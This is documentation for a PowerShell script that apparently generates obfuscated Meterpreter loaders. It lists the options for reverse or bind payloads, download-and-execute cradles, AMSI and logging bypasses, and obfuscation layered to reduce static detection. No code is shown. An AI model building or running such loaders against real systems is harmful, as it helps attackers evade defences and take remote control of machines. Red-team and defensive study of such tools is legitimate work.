Description
Generates an obfuscated PowerShell execution cradle that configures a Meterpreter payload (reverse or bind), applies logging and AMSI bypasses, and outputs a fully obfuscated loader script.
PowerShell Meterpreter Loader Generator
Overview
This PowerShell script builds a Meterpreter PowerShell loader based on user-specified payload and architecture parameters, applies logging and AMSI bypass techniques, and then performs multiple layers of PowerShell obfuscation before emitting the final script text.
The script supports both reverse and bind payload parameter sets and allows the operator to select specific obfuscation and AMSI bypass techniques.
Behavior Summary
- Determines whether to generate a reverse or bind payload loader.
- Generates a PowerShell cradle that downloads and executes the Meterpreter loader.
- Applies PowerShell logging bypass logic.
- Applies an AMSI bypass using the selected technique.
- Combines all components into a single script.
- Performs multiple obfuscation passes (comments, strings, variables, cmdlets, types, and function names).
- Outputs the final obfuscated PowerShell script as text.
Parameters
| Name | Type | Description |
|---|---|---|
Payload |
string |
The payload type to generate for reverse connections. Valid values are reverse_tcp, reverse_http, and reverse_https. Defaults to reverse_tcp. |
Architecture |
string |
The target architecture of the payload. Valid values are x86 and x64. This parameter is mandatory for both reverse and bind payloads. |
RHost |
string |
The remote IP address or hostname that the reverse payload will connect back to. Required when using the reverse parameter set. |
RPort |
int |
The TCP port used by the reverse payload for callback communication. Defaults to 4444. |
LPort |
int |
The local TCP port that a bind payload will listen on. Defaults to 4444. |
StringObfuscationTechnique |
PwshStringObfuscationTechnique |
The string obfuscation technique to apply during payload generation. Defaults to Format. |
AmsiBypassTechnique |
PwshAmsiBypassTechnique |
The AMSI bypass technique to use when generating the script. Defaults to InitFailed. |
Output
- Type:
string - Description: A fully combined and obfuscated PowerShell script containing logging bypasses, an AMSI bypass, and a Meterpreter loader cradle.
Notes
- The script emits only the final obfuscated payload and performs no execution by itself.
- Obfuscation filters are explicitly applied to high-risk strings, cmdlets, and .NET types to reduce static detection.
- Default values are selected to maximize compatibility while allowing customization where needed.